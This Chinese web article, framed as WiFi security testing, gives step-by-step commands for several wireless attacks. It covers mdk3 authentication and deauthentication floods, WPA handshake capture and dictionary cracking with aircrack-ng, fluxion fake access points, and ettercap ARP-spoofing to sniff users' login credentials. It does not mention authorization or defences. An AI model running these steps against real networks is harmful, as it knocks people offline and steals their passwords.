您当前的位置:首页 > 电脑百科 > 网络技术 > 网络技术

简单几步对WiFi无线网络安全测试

时间:2020-06-09 18:04:42  来源:  作者:

DOS攻击压力测试

攻击者发送和伪造大量数据包至AP进行攻击,将导致AP无法提供正常的服务或资源访问。在无线网络的环境下,常见的几种DOS攻击:

Authentication Flood

Deauthentication Flood

Disassociation Flood

RF Jamming

Association Flood等

用mdk3实现dos攻击:

挂载无线网卡,激活网卡为监听模式

airmon-ng start wlan0
简单几步对WiFi无线网络安全测试

 

扫描附近的无线信号

airodump-ng mon0
简单几步对WiFi无线网络安全测试

 

1、身份验证攻击(Authentication Flood)

这是一种验证请求攻击模式:在这个模式里,软件自动模拟随机产生的mac向目标AP发起大量验证请求,可以导致AP忙于处理过多的请求而停止对正常连接客户端的响应操作:

mdk3 mon0 a -a MAC
简单几步对WiFi无线网络安全测试

 

2、伪造断开连接(Deauthentication Flood)

在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包,可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!-C 后面跟的是信道。

mdk3 mon0 d -c 11

可以利用-s参数来加快发包速率,另外可以使用-w(白名单) –b(黑名单)来添加mac地址,这样我们就可以使自己伪造的AP永远的不受自己的攻击所影响,而黑白名单可以写单独的一个mac也可以写文件的绝对路径,然后把要加入名单的mac写在文件里。

密码破解

抓取握手包破解WiFi密码

1、aircrack暴力破解无线密码

挂载无线网卡,激活网卡为监听模式

airmon-ng start wlan0

扫描附近的无线信号,主要是找对应的信道

airodump-ng mon0

监听某信道WiFi并保存报文

airodump-ng -c 11 -w /root/baowen mon0

使目标断线重连抓取握手包(例如进行10次dos攻击是终端断线重连抓包)

aireplay-ng -0 10 -a wifi的mac地址 -c 客户端mac地址 mon0
简单几步对WiFi无线网络安全测试

 

抓到握手包后即可ctrl+c 结束,开始破解

aircrack-ng -w 字典目录 报文目录
eg: aircrack-ng -w ./pass/wifipass.txt ./baowen/123-01.cap
简单几步对WiFi无线网络安全测试

 

2、使用自动化工具fluxion进行密码破解和AP欺骗

Fluxion 可进行暴力破解和伪造AP攻击获取无线信息

运行fluxion,选择语言、信道

简单几步对WiFi无线网络安全测试

 

确认后会运行airodump-ng扫描无线热点

简单几步对WiFi无线网络安全测试

 

出现目标ssid后Ctrl+C结束,会显示扫描的热点信息

简单几步对WiFi无线网络安全测试

 

选择对应的热点,执行后执行dos攻击断开目标连接进而抓取握手包

简单几步对WiFi无线网络安全测试

 

可直接保存抓取的握手包进行暴力破解,同时也可选择伪造AP进行欺骗

简单几步对WiFi无线网络安全测试

 

嗅探、中间人攻击

攻击者处于无线局域网中,若网络未作端口隔离,可利用ARP欺骗等手段,对同网段用户,进行中间人攻击,并分析获取用户信息。可能导致无线数据篡改使得WLAN业务系统正常访问数据被非法窃取、篡改和破坏。

使用ettercap工具嗅探用户数据

首先启用路由转发

echo 1 >> /proc/sys/net/ipv4/ip_forward

使用ARP欺骗,利用ettercap实现中间人攻击

指定网卡,Unified sniffing 选择eth0

简单几步对WiFi无线网络安全测试

 

扫描主机scan for hosts

简单几步对WiFi无线网络安全测试

 

查看hosts list

简单几步对WiFi无线网络安全测试

 

此处选择要欺骗的主机,点击Add to target 1,选择网关Add to target 2

简单几步对WiFi无线网络安全测试

 

选择菜单Mitm,勾选Sniff remote connections

简单几步对WiFi无线网络安全测试

 

开始欺骗嗅探

简单几步对WiFi无线网络安全测试

 

通过菜单栏View -> connection可以查看嗅探的数据(登录用户名密码信息)

简单几步对WiFi无线网络安全测试

 



Tags:网络安全测试   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
DOS攻击压力测试攻击者发送和伪造大量数据包至AP进行攻击,将导致AP无法提供正常的服务或资源访问。在无线网络的环境下,常见的几种DOS攻击:Authentication FloodDeauthenticati...【详细内容】
2020-06-09  Tags: 网络安全测试  点击:(193)  评论:(0)  加入收藏
▌简易百科推荐
写一个shell获取本机ip地址、网关地址以及dns信息。经常会遇到取本机ip、网关、dns地址,windows一个命令ipconfig /all全部获取到,但linux系统却并非如此。linux系统都自带ifc...【详细内容】
2021-12-27  K佬食古    Tags:shell   点击:(2)  评论:(0)  加入收藏
步骤1、配置 /etc/sysconfig/network-scripts/ifcfg-eth0 里的文件。it动力的CentOS下的ifcfg-eth0的配置详情:[root@localhost ~]# vim /etc/sysconfig/network-scripts/ifc...【详细内容】
2021-12-24  忆梦如风    Tags:网卡   点击:(10)  评论:(0)  加入收藏
1、查找当前目录下所有以.tar结尾的文件然后移动到指定目录find . -name “*.tar” -execmv {}./backup/ ;注解:find –name 主要用于查找某个文件名字,-exec 、xargs可...【详细内容】
2021-12-17  郭主任    Tags:运维   点击:(20)  评论:(0)  加入收藏
对于经常上网的朋友来说,除了手机购物上网,pc端玩网页游戏还是很多小伙伴首选的,但是有时候明明宽带链接上了,打开浏览器却出现上不了网的现象,下面小编要来跟大家说说电脑有网络...【详细内容】
2021-12-16  小白系统    Tags:网页无法打开   点击:(28)  评论:(0)  加入收藏
在访问像github、gitlab这样的外国网站时,很有可能会出现页面加载不出来或找不到页面的错误。这时候有的朋友就会以为是网络的问题,于是把Wifi断掉连上自己手机的热点,结果却还...【详细内容】
2021-12-15  启施技术IT狼叔    Tags:外网   点击:(16)  评论:(0)  加入收藏
网络地址来源:获取公网IP地址 https://ipip.yy.com/get_ip_info.phphttp://pv.sohu.com/cityjson?ie=utf-8http://www.ip168.com/json.do?view=myipaddress...【详细内容】
2021-12-15  韦廷华12    Tags:外网ip   点击:(15)  评论:(0)  加入收藏
准备好软件IPOP、用ENSP模拟一下华为交换机 启动交换机 <Huawei>sysEnter system view, return user view with Ctrl+Z.[Huawei]sysname FTPClient[FTPClient]interface vla...【详细内容】
2021-12-15  思源Edward    Tags:交换机   点击:(24)  评论:(0)  加入收藏
我们经常用到netstat命令查看主机连接状况,包括连接ip、端口、状态等,今天就练习下shell分析netsat结果。描述假设netstat命令运行的结果我们存储在nowcoder.txt里,格式如下:Pro...【详细内容】
2021-12-14  K佬食古    Tags:netstat   点击:(19)  评论:(0)  加入收藏
什么是滑动窗口?窗口是操作系统开辟的一块缓存空间,发送方在收到接收方ACK应答之前,必须在缓冲区保留已发送的数据,如果按期收到确认应答,数据就可以从缓冲区移除。什么是滑动窗...【详细内容】
2021-12-14  DifferentJava    Tags:TCP   点击:(30)  评论:(0)  加入收藏
概述日常管理华为路由设备过程中,难为会忘记设备登录密码,那么该如何重置设备登录密码吗?本期文章将全面向各位小伙伴总结分享。重置华为设备登录密码思路先行 采用console登录...【详细内容】
2021-12-10  onme0    Tags:   点击:(27)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条